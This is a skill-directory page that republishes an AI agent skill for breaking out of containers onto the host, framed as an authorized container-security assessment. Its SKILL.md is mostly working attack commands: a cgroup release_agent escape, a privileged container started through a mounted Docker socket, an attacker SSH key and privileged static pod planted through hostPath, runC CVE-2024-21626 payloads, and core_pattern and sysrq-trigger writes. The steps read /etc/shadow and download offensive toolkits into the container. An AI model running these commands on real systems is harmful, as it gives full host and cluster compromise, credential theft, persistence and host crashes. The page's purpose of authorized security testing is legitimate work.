Agent skill

Escaping Containers To Host

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.

Apache-2.0Auto-check passedSecurity

Install Escaping Containers To Host

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/escaping-containers-to-host .claude/skills/escaping-containers-to-host && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
escaping-containers-to-host
GitHub stars
34k
Token cost
~3.4k tokens
SKILL.md length
872 words
Files
5 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.

  • Works in 7 steps: Enumerate the Container Environment → Escape via a Privileged Container… → Escape via a Mounted Docker Socket → …
  • Executing an approved breakout test
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 5 more sections
  • Runs Python scripts from its folder; calls docker, curl and sh; reaches github.com

What it does

Escaping Containers To Host is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment. Use when executing an approved breakout test, demonstrating the real impact of a privileged or hostPath workload, or validating that escape mitigations actually hold. Keywords: container breakout, privileged, hostPath, docker.sock, runC CVE-2019-5736, CVE-2024-21626, releaseagent, nsenter. Do not use for defensive detection of…

Its SKILL.md is about 3.4k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).

It sits in Security, covering Vulnerability scanning, Containers and Cloud security. It works with Docker. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Executing an approved breakout test
  • Demonstrating the real impact of a privileged
  • HostPath workload
  • Validating that escape mitigations actually hold

Example prompts

  • “Use the escaping-containers-to-host skill to exploit privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container…”
  • “/escaping-containers-to-host”

Requirements

  • Python 3
  • Docker

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. Enumerate the Container Environment
  2. Escape via a Privileged Container (cgroup release_agent)
  3. Escape via a Mounted Docker Socket
  4. Escape via a hostPath Mount (Kubernetes)
  5. Exploit runC CVE-2024-21626 (Leaky Vessels fd leak)
  6. Exploit the 2025 runC procfs Write-Redirect Family
  7. Validate the Patched State and Document Remediation

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • docker
    • curl
    • sh
    • git
    • kubectl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    Also links to:

    • sysdig.com
    • paloaltonetworks.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Escaping Containers To Host loads about 3.4k tokens when it runs, and up to ~4.6k if it reads all its reference files. Until then it costs about 151 tokens; SKILL.md has 872 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~151
When it runs · the whole SKILL.md, loaded when a task matches
~3.4k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~4.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 872 words, ~3,396 tokens.

Download SKILL.mdSave it as .claude/skills/escaping-containers-to-host/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.
name
escaping-containers-to-host
description
Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment. Use when executing an approved breakout test, demonstrating the real impact of a privileged or hostPath workload, or validating that escape mitigations actually hold. Keywords: container breakout, privileged, hostPath, docker.sock, runC CVE-2019-5736, CVE-2024-21626, release_agent, nsenter. Do not use for defensive detection of these techniques - use detecting-container-escape-attempts.
domain
cybersecurity
subdomain
container-security
tags
container-escape, privileged-container, runc-cve, docker-socket, host-mount, kubernetes, privilege-escalation, breakout
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01
mitre_attack
T1611

Escaping Containers to Host

Legal Notice: This skill is for authorized security testing and educational purposes only. Container breakout grants full host compromise. Only run these techniques against systems you own or have explicit written authorization to test. Unauthorized use is illegal and may violate computer fraud laws.

Overview

Container escape (MITRE ATT&CK T1611, Escape to Host) is the act of breaking the isolation boundary between a container and the host operating system, giving an attacker code execution in the host namespace — and, on Kubernetes, frequently a route to the entire node and then the cluster. Containers share the host kernel and rely on namespaces, cgroups, capabilities, seccomp, and LSMs (AppArmor/SELinux) for isolation. When any of these controls are weakened (a --privileged container, a mounted Docker socket, a hostPath mount of /, excess Linux capabilities such as CAP_SYS_ADMIN) or when a runtime contains a vulnerability, that boundary collapses.

This skill covers the four highest-impact, real-world escape primitives observed by Sysdig, Unit 42, and the runC maintainers:

  1. Misconfiguration escapes — privileged containers, CAP_SYS_ADMIN, host PID/IPC/Network namespaces, and hostPath mounts.
  2. Exposed Docker socket (/var/run/docker.sock) — mounting the daemon socket into a container hands an attacker root on the host via a new privileged container.
  3. The "Leaky Vessels" runC fd leak, CVE-2024-21626 — runC leaks an internal file descriptor (/proc/self/fd/7/8) referencing the host filesystem before pivot_root; setting the container working directory to that fd lands the process on the host. Patched in runC 1.1.12 (containerd 1.6.28/1.7.13, Docker 25.0.2).
  4. The November 2025 runC procfs write-redirect family — CVE-2025-31133, CVE-2025-52565, CVE-2025-52881 — race/symlink abuse of the /dev/null, /dev/console, and other bind mounts performed before runC applies maskedPaths/readonlyPaths, allowing read-write access to /proc entries (e.g. /proc/sysrq-trigger, core_pattern) and arbitrary write redirection. Patched in runC 1.2.8, 1.3.3, and 1.4.0-rc.3.

Sources: Palo Alto Networks "Leaky Vessels" advisory; Sysdig "New runc vulnerabilities allow container escape" (2025); opencontainers/runc security advisories GHSA-cgrx-mc8f-2prm and GHSA-9493-h29p-rfm2; Unit 42 container-escape research.

When to Use

  • During an authorized container or Kubernetes penetration test after obtaining initial code execution inside a container or pod
  • When validating that runtime defenses (Falco, seccomp, AppArmor) detect or block breakout attempts
  • When assessing the blast radius of a compromised microservice
  • When verifying patch levels of runC/containerd/Docker against the CVEs above

Prerequisites

  • Authorization (signed rules of engagement) covering host/node compromise
  • A foothold: a shell inside a target container
  • Reconnaissance utilities inside the container or staged in:
    bash
    # deepce - Docker enumeration and escape
    git clone https://github.com/stealthcopter/deepce.git
    # amicontained - container introspection (capabilities, seccomp, namespaces)
    curl -L https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64 -o amicontained
    chmod +x amicontained
    # CDK - zero-dependency K8s/container pentest toolkit
    curl -L https://github.com/cdk-team/CDK/releases/latest/download/cdk_linux_amd64 -o cdk
    chmod +x cdk
  • A lab cluster/host you are permitted to break out of (e.g., kind, minikube, or a dedicated VM)

Objectives

  • Enumerate the container's privilege posture (capabilities, namespaces, mounts, seccomp)
  • Identify which escape primitive is available
  • Execute a host breakout and prove host-level code execution
  • Capture evidence (host hostname, host /etc/shadow access, or a host file write)
  • Document the root-cause misconfiguration or vulnerable runtime version for remediation

MITRE ATT&CK Mapping

Technique IDNameTactic
T1611Escape to HostPrivilege Escalation
T1610Deploy ContainerDefense Evasion / Execution
T1613Container and Resource DiscoveryDiscovery
T1068Exploitation for Privilege EscalationPrivilege Escalation

Workflow

Step 1: Enumerate the Container Environment

Determine privilege level, capabilities, namespaces, and mounted host paths.

bash
# Quick capability + namespace + seccomp introspection
./amicontained

# Are we privileged? CapEff ending in ...ffffffff is "all caps"
grep CapEff /proc/self/status
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')

# Host filesystem or docker socket mounted in?
mount | grep -E 'docker.sock|hostPath|/host'
ls -la /var/run/docker.sock 2>/dev/null
findmnt -o TARGET,SOURCE,FSTYPE,OPTIONS

# Sharing host namespaces? (host PID = can see host processes)
ps aux | head        # if you see systemd/host pids, hostPID:true
ls -la /proc/1/root  # if readable as host root, namespace is shared

# Automated enumeration
./deepce.sh
./cdk evaluate
Show full SKILL.md (367 more words)Show less
Step 2: Escape via a Privileged Container (cgroup release_agent)

A --privileged container (or one with CAP_SYS_ADMIN) can mount a cgroup hierarchy and abuse the release_agent to run a command on the host when the last process in a cgroup exits.

bash
# Confirm we can mount (CAP_SYS_ADMIN present)
# Create a cgroup mount and enable release_agent notification
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp 2>/dev/null || \
  mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release

# Find the container rootfs path on the host
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Payload that runs on the HOST
cat > /cmd <<'EOF'
#!/bin/sh
ps aux > /output
hostname >> /output
cat /etc/shadow >> /output
EOF
chmod +x /cmd

# Trigger: spawn and immediately exit a process in the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output   # host process list / shadow proves escape
Step 3: Escape via a Mounted Docker Socket

If /var/run/docker.sock is bind-mounted into the container, you control the host Docker daemon and can launch a new container that mounts the host root.

bash
# Confirm reachability
docker -H unix:///var/run/docker.sock version 2>/dev/null || \
  curl -s --unix-socket /var/run/docker.sock http://localhost/version

# Launch a privileged container mounting host / and chroot into it
docker -H unix:///var/run/docker.sock run -it --rm \
  --privileged --net=host --pid=host \
  -v /:/host alpine chroot /host sh

# Pure-curl variant (no docker CLI in container):
curl -s -XPOST --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /host/etc/shadow"],
       "Binds":["/:/host"],"Privileged":true}' \
  http://localhost/containers/create?name=esc
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/esc/start
Step 4: Escape via a hostPath Mount (Kubernetes)

A pod with a hostPath volume of / (or a sensitive host dir) lets you read/write host files directly — e.g., drop a root SSH key or a privileged static pod manifest.

bash
# If /host is the hostPath mount of node root:
ls /host
# Persist: add an attacker key for node root login
mkdir -p /host/root/.ssh
echo "ssh-ed25519 AAAA... attacker@kali" >> /host/root/.ssh/authorized_keys

# Or write a privileged static pod manifest that kubelet will auto-run as root
cat > /host/etc/kubernetes/manifests/pwn.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata: {name: pwn, namespace: kube-system}
spec:
  hostPID: true
  containers:
  - name: pwn
    image: alpine
    command: ["/bin/sh","-c","sleep 1d"]
    securityContext: {privileged: true}
    volumeMounts: [{name: host, mountPath: /host}]
  volumes: [{name: host, hostPath: {path: /}}]
EOF
Step 5: Exploit runC CVE-2024-21626 (Leaky Vessels fd leak)

If the runtime is runC <= 1.1.11, the leaked host-cwd fd can be used. With docker build/docker run control, set the working directory to /proc/self/fd/<N> (commonly 7 or 8).

bash
# Detect vulnerable runtime version (host or via runc binary in image)
runc --version          # vulnerable: 1.0.0-rc93 .. 1.1.11
docker info --format '{{.DefaultRuntime}}'

# Proof-of-concept via a malicious image WORKDIR (run-time variant)
cat > Dockerfile <<'EOF'
FROM alpine
# fd 7/8 leaked by runc references the HOST cwd before pivot_root
WORKDIR /proc/self/fd/8
RUN ["/bin/sh","-c","cd ../../../../ ; cat etc/shadow ; cat etc/hostname"]
EOF
docker build --no-cache -t leaky .

# Run-time variant: the container lands in a host directory
docker run --rm --workdir /proc/self/fd/8 alpine \
  sh -c 'cd ../../../.. && cat etc/shadow'
# Reference PoC: github.com/strikoder/cve-2024-21626-runc-1.1.11-escape
Step 6: Exploit the 2025 runC procfs Write-Redirect Family

For runC <= 1.2.7 / 1.3.2 / 1.4.0-rc.2, CVE-2025-31133/52565/52881 abuse a race between the /dev/null//dev/console bind mount and the application of maskedPaths, replacing the mount target with a symlink so a host /proc entry becomes writable. Writing core_pattern or /proc/sysrq-trigger yields host code execution.

bash
# Confirm vulnerable runtime
runc --version   # vulnerable: <= 1.2.7, 1.3.2, 1.4.0-rc.2

# Conceptual exploitation flow (use maintainers' PoC in a lab):
#  1. Start a container that, during init, swaps the /dev/console (or a
#     custom device) bind-mount target for a symlink to /proc/sysrq-trigger.
#  2. Win the race so runc bind-mounts it read-write before maskedPaths apply.
#  3. Redirect a write to host procfs:
echo c > /proc/sysrq-trigger     # would crash host (DoS) - demonstrates RW
#  4. For code exec, redirect the write to /proc/sys/kernel/core_pattern:
echo '|/bin/sh -c "id>/host_pwn"' > /proc/sys/kernel/core_pattern
#     then trigger a core dump in any host-visible process.
# Advisories: GHSA-cgrx-mc8f-2prm, GHSA-9493-h29p-rfm2
Step 7: Validate the Patched State and Document Remediation
bash
# Verify runtimes are patched
runc --version              # want >= 1.2.8 / 1.3.3 / 1.4.0-rc.3 (and != vuln 1.1.x)
docker version --format '{{.Server.Version}}'   # >= 25.0.2 for CVE-2024-21626
containerd --version        # >= 1.6.28 / 1.7.13

# Confirm hardening for misconfig escapes
docker inspect <ctr> --format '{{.HostConfig.Privileged}}'   # want false
kubectl get pod <pod> -o jsonpath='{.spec.containers[*].securityContext}'

Tools and Resources

ToolPurposeSource
amicontainedCapability/namespace/seccomp introspectionhttps://github.com/genuinetools/amicontained
deepceDocker enumeration & escape automationhttps://github.com/stealthcopter/deepce
CDKContainer/K8s penetration toolkithttps://github.com/cdk-team/CDK
runc PoC (CVE-2024-21626)Leaky Vessels reference exploithttps://github.com/strikoder/cve-2024-21626-runc-1.1.11-escape
Sysdig runc 2025 advisoryCVE-2025-31133/52565/52881 analysishttps://www.sysdig.com/blog/runc-container-escape-vulnerabilities
Palo Alto Leaky VesselsCVE-2024-21626 deep divehttps://www.paloaltonetworks.com/blog/cloud-security/leaky-vessels-vulnerabilities-container-escape/

Escape Primitive Reference

PrimitiveRoot CauseDetection Signal
Privileged container--privileged / CAP_SYS_ADMINmount of cgroup, write to release_agent
Docker socket mount/var/run/docker.sock bind-mountedDaemon API call from a container
hostPath / mountPod mounts node rootWrite to /host/etc/kubernetes/manifests
CVE-2024-21626runC fd leak before pivot_rootWORKDIR/cwd =/proc/self/fd/N
CVE-2025-31133/52565/52881procfs write redirect via mount raceRW mount of /dev/console, write to /proc/sysrq-trigger

Validation Criteria

  • Container privilege posture enumerated (caps, namespaces, mounts, seccomp)
  • Available escape primitive correctly identified
  • Host-level code execution demonstrated (host hostname / /etc/shadow / host file write captured)
  • Root-cause misconfiguration or vulnerable runtime version recorded
  • runC/containerd/Docker versions checked against CVE patch baselines
  • Remediation guidance (drop privileges, remove socket mount, patch runtime) documented
  • All actions stayed within the authorized scope

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 4 other files (scripts, references) in skills/escaping-containers-to-host of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • references/standards.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Escaping Containers To Host next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Escaping Containers To Host compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Escaping Containers To Host this skillmukul975/Anthropic-Cybersecurity-Skills34k—~3.4kAutomated safety check: PassApache-2.0
Container Securityhardw00t/ai-security-arsenal105—~2.8kAutomated safety check: PassNone
Container Security Hardeningsickn33/agentic-awesome-skills47k1 repos~1kAutomated safety check: NotesMIT
Security Analyzeraiskillstore/marketplace433—~1.2kAutomated safety check: NotesNone
Cyberowlaikarimhabush/cyberowl263—~2.5kAutomated safety check: PassMIT
Warp Vulnerability Triagewarpdotdev/warp65k1 repos~2.1kAutomated safety check: PassAGPL-3.0

Similar skills

  • Container Security

    hardw00t/ai-security-arsenal

    Container and Kubernetes security assessment — image vulnerability scanning, SBOM diff analysis, K8s cluster auditing, RBAC privilege mapping, NetworkPolicy review, container escape testing, and…

    105 GitHub stars~2.8k tokensUpdated 5 mo ago
    SecurityAuto-check passed
  • Container Security Hardening

    sickn33/agentic-awesome-skills

    Harden Docker/container images and runtime deployments with secure base images, non-root users, CVE scanning, SBOM/signing, seccomp/AppArmor, and Kubernetes pod security controls.

    47k GitHub starsUsed in 1 repo~1k tokens
    SecurityAuto-check: notes
  • Security Analyzer

    aiskillstore/marketplace

    Comprehensive security vulnerability analysis for codebases and infrastructure.

    433 GitHub stars~1.2k tokensUpdated today
    SecurityAuto-check: notes
  • Cyberowlai

    karimhabush/cyberowl

    Check if recent cybersecurity alerts from 10 international CERTs affect your current project.

    263 GitHub stars~2.5k tokensUpdated yesterday
    SecurityAuto-check passed
  • Gathers security findings from Dependabot, GCP container scanning, Docker Scout and Linear security issues, then triages and remediates them across Warp's repos and images.

    65k GitHub starsUsed in 1 repo~2.1k tokens
    SecurityAuto-check passed
  • Container Scanning with Grype

    AgentSecOps/SecOpsAgentKit

    Scans container images, filesystems and SBOMs with Grype for known vulnerabilities, ranks them by CVSS, EPSS and CISA KEV, and wires scans into CI/CD thresholds.

    220 GitHub starsUsed in 1 repo~2.5k tokens
    SecurityAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Questions about Escaping Containers To Host

What does Escaping Containers To Host do?

Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment. Escaping Containers To Host is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.

When should I use Escaping Containers To Host?

Escaping Containers To Host fits situations like: executing an approved breakout test; demonstrating the real impact of a privileged; hostPath workload; validating that escape mitigations actually hold.

How do I install Escaping Containers To Host in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a claude-code`. Or copy the skill folder (skills/escaping-containers-to-host in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/escaping-containers-to-host in your project. Claude Code loads it when a task matches its description.

How do I install Escaping Containers To Host in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a codex`. Or copy the skill folder (skills/escaping-containers-to-host in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/escaping-containers-to-host in your project. Codex loads it when a task matches its description.

Can I use Escaping Containers To Host in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/escaping-containers-to-host, .gemini/skills/escaping-containers-to-host, .github/skills/escaping-containers-to-host and .opencode/skills/escaping-containers-to-host in your project.

What does Escaping Containers To Host need to run?

Going by SKILL.md and its folder, Escaping Containers To Host needs Python for the scripts in its folder and the command-line tools its instructions call (docker, curl, sh, git and kubectl). Our summary lists: Python 3; Docker.

Does Escaping Containers To Host access the network?

SKILL.md names 3 domains. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. As links in the text: sysdig.com and paloaltonetworks.com. This is read from the text; nothing was executed.

Is Escaping Containers To Host safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Escaping Containers To Host use?

Escaping Containers To Host is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Escaping Containers To Host use?

About 3.4k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.2k tokens, read only when the agent opens those files.

What are the alternatives to Escaping Containers To Host?

Skills that share tags, products or a category with Escaping Containers To Host: Container Security (hardw00t/ai-security-arsenal, 105 stars), Container Security Hardening (sickn33/agentic-awesome-skills, 47k stars), Security Analyzer (aiskillstore/marketplace, 433 stars) and Cyberowlai (karimhabush/cyberowl, 263 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Escaping Containers To Host?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.